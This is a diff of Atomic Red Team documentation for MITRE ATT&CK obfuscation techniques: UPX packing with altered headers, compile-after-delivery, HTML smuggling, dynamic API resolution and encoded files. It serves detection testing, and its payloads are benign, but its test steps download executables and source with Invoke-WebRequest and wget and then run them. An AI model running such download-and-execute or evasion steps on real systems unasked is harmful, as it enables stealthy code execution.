+#### Attack Commands: Run with `sh`!

 ```sh
 truncate -s +1 #{file_to_pad} #adds a byte to the file size
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm #{file_to_pad}
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: The binary must exist on disk at specified location (#{file_to_pad})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 cp /bin/ls #{file_to_pad}
 ```

-
-
-
-<br/>
@@ -1,65 +1,48 @@
 # T1027.002 - Obfuscated Files or Information: Software Packing
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/002)
-<blockquote>

-Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
+## Description from ATT&CK

-Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)  
+> Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)
+> 
+> Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1027/002)

 ## Atomic Tests

- [Atomic Test #1 - Binary simply packed by UPX (linux)](#atomic-test-1---binary-simply-packed-by-upx-linux)
+- [Atomic Test #1: Binary simply packed by UPX (linux)](#atomic-test-1-binary-simply-packed-by-upx-linux)
+- [Atomic Test #2: Binary packed by UPX, with modified headers (linux)](#atomic-test-2-binary-packed-by-upx-with-modified-headers-linux)
+- [Atomic Test #3: Binary simply packed by UPX](#atomic-test-3-binary-simply-packed-by-upx)
+- [Atomic Test #4: Binary packed by UPX, with modified headers](#atomic-test-4-binary-packed-by-upx-with-modified-headers)

- [Atomic Test #2 - Binary packed by UPX, with modified headers (linux)](#atomic-test-2---binary-packed-by-upx-with-modified-headers-linux)
+### Atomic Test #1: Binary simply packed by UPX (linux)

- [Atomic Test #3 - Binary simply packed by UPX](#atomic-test-3---binary-simply-packed-by-upx)
-
- [Atomic Test #4 - Binary packed by UPX, with modified headers](#atomic-test-4---binary-packed-by-upx-with-modified-headers)
-
-
-<br/>
-
-## Atomic Test #1 - Binary simply packed by UPX (linux)
 Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
 No other protection/compression were applied.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `11c46cd8-e471-450e-acb8-52a1216ae6a4`

-**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm /tmp/packed_bin
 ```
+### Atomic Test #2: Binary packed by UPX, with modified headers (linux)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Binary packed by UPX, with modified headers (linux)
 Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.

 The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
@@ -67,77 +50,53 @@ by some methods, and especially UPX is not able to uncompress it any more.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `f06197f8-ff46-48c2-a0c6-afc1b50665e1`

-**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm /tmp/packed_bin
 ```
+### Atomic Test #3: Binary simply packed by UPX

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Binary simply packed by UPX
 Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
 No other protection/compression were applied.

 **Supported Platforms:** macOS

+**auto_generated_guid:** `b16ef901-00bb-4dda-b4fc-a04db5067e20`

-**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm /tmp/packed_bin
 ```
+### Atomic Test #4: Binary packed by UPX, with modified headers

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Binary packed by UPX, with modified headers
 Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.

 The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
@@ -145,33 +104,22 @@ by some methods, and especially UPX is not able to uncompress it any more.

 **Supported Platforms:** macOS

+**auto_generated_guid:** `4d46e16b-5765-4046-9f25-a600d3e65e4d`

-**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm /tmp/packed_bin
 ```
-
-
-
-
-
-<br/>
@@ -1,81 +1,68 @@
 # T1027.004 - Obfuscated Files or Information: Compile After Delivery
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/004)
-<blockquote>

-Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+## Description from ATT&CK

-Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
+> Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+> 
+> Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1027/004)

 ## Atomic Tests

- [Atomic Test #1 - Compile After Delivery using csc.exe](#atomic-test-1---compile-after-delivery-using-cscexe)
+- [Atomic Test #1: Compile After Delivery using csc.exe](#atomic-test-1-compile-after-delivery-using-cscexe)
+- [Atomic Test #2: Dynamic C# Compile](#atomic-test-2-dynamic-c-compile)
+- [Atomic Test #3: C compile](#atomic-test-3-c-compile)
+- [Atomic Test #4: CC compile](#atomic-test-4-cc-compile)
+- [Atomic Test #5: Go compile](#atomic-test-5-go-compile)

- [Atomic Test #2 - Dynamic C# Compile](#atomic-test-2---dynamic-c-compile)
+### Atomic Test #1: Compile After Delivery using csc.exe

- [Atomic Test #3 - C compile](#atomic-test-3---c-compile)
-
- [Atomic Test #4 - CC compile](#atomic-test-4---cc-compile)
-
- [Atomic Test #5 - Go compile](#atomic-test-5---go-compile)
-
-
-<br/>
-
-## Atomic Test #1 - Compile After Delivery using csc.exe
 Compile C# code using csc.exe binary used by .NET
 Upon execution an exe named T1027.004.exe will be placed in the temp folder

 **Supported Platforms:** Windows

+**auto_generated_guid:** `ffcdbd6a-b0e8-487d-927a-09127fe9a206`

-**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output compiled binary | path | C:&#92;Windows&#92;Temp&#92;T1027.004.exe|
 | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | path | PathToAtomicsFolder&#92;T1027.004&#92;src&#92;calc.cs|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} "#{input_file}"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del #{output_file} >nul 2>&1
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: C# file must exist on disk at specified location (#{input_file})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{input_file}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "#{input_file}") -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}"
 ```

+### Atomic Test #2: Dynamic C# Compile

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Dynamic C# Compile
 When C# is compiled dynamically, a .cmdline file will be created as a part of the process. 
 Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
 The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
@@ -83,66 +70,52 @@ Upon execution, the exe will print 'T1027.004 Dynamic Compile'.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `453614d8-3ba6-4147-acc0-7ec4b3e1faef`

-**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | exe program containing dynamically compiled C# code | path | PathToAtomicsFolder&#92;T1027.004&#92;bin&#92;T1027.004_DynamicCompile.exe|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Invoke-Expression "#{input_file}"
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: exe file must exist on disk at specified location (#{input_file})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{input_file}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile "#{input_file}"
 ```

+### Atomic Test #3: C compile

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - C compile
 Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `d0377aa6-850a-42b2-95f0-de558d80be57`

-**auto_generated_guid:** d0377aa6-850a-42b2-95f0-de558d80be57
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | source file | path | PathToAtomicsFolder/T1027.004/src/T1027-004-test.c|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 gcc #{input_file} && ./a.out
@@ -150,45 +123,37 @@ clang #{input_file} && ./a.out
 ```


+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: the source file must exist on disk at specified location (#{input_file})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -e  #{input_file} ]; then exit 0; else exit 1; fi
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -O "#{input_file}"
 ```

+### Atomic Test #4: CC compile

-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - CC compile
 Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `da97bb11-d6d0-4fc1-b445-e443d1346efe`

-**auto_generated_guid:** da97bb11-d6d0-4fc1-b445-e443d1346efe
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | source file | path | PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 g++ #{input_file} && ./a.out
@@ -196,65 +161,56 @@ clang++ #{input_file} && ./a.out
 ```


+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: the source file must exist on disk at specified location (#{input_file})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -e  #{input_file} ]; then exit 0; else exit 1; fi
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.cc -O #{input_file}
 ```

+### Atomic Test #5: Go compile

-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Go compile
 Compile a go file with golang on FreeBSD, Linux or Macos.

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `78bd3fa7-773c-449e-a978-dc1f1500bc52`

-**auto_generated_guid:** 78bd3fa7-773c-449e-a978-dc1f1500bc52
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | source file | path | PathToAtomicsFolder/T1027.004/src/T1027-004-test.go|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 go run #{input_file}
 ```


+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: the source file must exist on disk at specified location (#{input_file})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -e  #{input_file} ]; then exit 0; else exit 1; fi
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.go -O #{input_file}
 ```

-
-
-
-<br/>
@@ -1,63 +1,54 @@
 # T1027.006 - HTML Smuggling
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/006)
-<blockquote>

-Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
+## Description from ATT&CK

-Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
+> Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
+> 
+> Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
+> 
+> For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)

-For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1027/006)

 ## Atomic Tests

- [Atomic Test #1 - HTML Smuggling Remote Payload](#atomic-test-1---html-smuggling-remote-payload)
+- [Atomic Test #1: HTML Smuggling Remote Payload](#atomic-test-1-html-smuggling-remote-payload)

+### Atomic Test #1: HTML Smuggling Remote Payload

-<br/>
-
-## Atomic Test #1 - HTML Smuggling Remote Payload
 The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction. 
 The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `30cbeda4-08d9-42f1-8685-197fad677734`

-**auto_generated_guid:** 30cbeda4-08d9-42f1-8685-197fad677734
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 & "PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 $user = [System.Environment]::UserName; Remove-Item -Path C:\Users\$user\Downloads\FeelTheBurn.iso -ErrorAction Ignore
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html") { exit 0} else { exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
 ```

-
-
-
-<br/>
@@ -1,44 +1,36 @@
 # T1027.007 - Obfuscated Files or Information: Dynamic API Resolution
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/007)
-<blockquote>

-Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
+## Description from ATT&CK

-API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)
+> Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
+> 
+> API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)
+> 
+> To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
+> 
+> Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)

-To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
-
-Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1027/007)

 ## Atomic Tests

- [Atomic Test #1 - Dynamic API Resolution-Ninja-syscall](#atomic-test-1---dynamic-api-resolution-ninja-syscall)
+- [Atomic Test #1: Dynamic API Resolution-Ninja-syscall](#atomic-test-1-dynamic-api-resolution-ninja-syscall)

+### Atomic Test #1: Dynamic API Resolution-Ninja-syscall

-<br/>
-
-## Atomic Test #1 - Dynamic API Resolution-Ninja-syscall
 This test calls NtCreateFile via API hashing and dynamic syscall resolution. I have dubbed this particular combination of techniques 'Ninja-syscall'. When successful, a new file named 'hello.log' will be created in the default user's temporary folder, which is a common location for a dropper.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `578025d5-faa9-4f6d-8390-aae739d507e1`

-**auto_generated_guid:** 578025d5-faa9-4f6d-8390-aae739d507e1
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_binary | PE binary | path | PathToAtomicsFolder&#92;T1027.007&#92;bin&#92;ninja_syscall1.exe|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 Start-Process "#{exe_binary}"
@@ -46,26 +38,26 @@ Start-Sleep -Seconds 7
 if (Test-Path "C:\Users\Default\AppData\Local\Temp\hello.log") { Remove-Item "C:\Users\Default\AppData\Local\Temp\hello.log" -Force; Write-Host "[+] hello.log removed." }
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 if (Test-Path "C:\Users\Default\AppData\Local\Temp\hello.log") { Remove-Item "C:\Users\Default\AppData\Local\Temp\hello.log" -Force; Write-Host "[+] hello.log removed." }
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Portable Executable to run must exist at specified location (#{exe_binary})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.007/bin/ninja_syscall1.exe" -OutFile "#{exe_binary}"
 ```

-
-
-
-<br/>
@@ -1,99 +1,126 @@
 # T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/013)
-<blockquote>

-Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
+## Description from ATT&CK

-This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.
+> Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
+> 
+> This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.
+> 
+> The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
+> 
+> For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File)
+> 
+> Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.

-The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
-
-For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) 
-
-Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1027/013)

 ## Atomic Tests

- [Atomic Test #1 - Decode Eicar File and Write to File](#atomic-test-1---decode-eicar-file-and-write-to-file)
+- [Atomic Test #1: Decode Eicar File and Write to File](#atomic-test-1-decode-eicar-file-and-write-to-file)
+- [Atomic Test #2: Decrypt Eicar File and Write to File](#atomic-test-2-decrypt-eicar-file-and-write-to-file)
+- [Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution](#atomic-test-3-password-protected-zip-payload-extraction-and-execution)

- [Atomic Test #2 - Decrypt Eicar File and Write to File](#atomic-test-2---decrypt-eicar-file-and-write-to-file)
+### Atomic Test #1: Decode Eicar File and Write to File

-
-<br/>
-
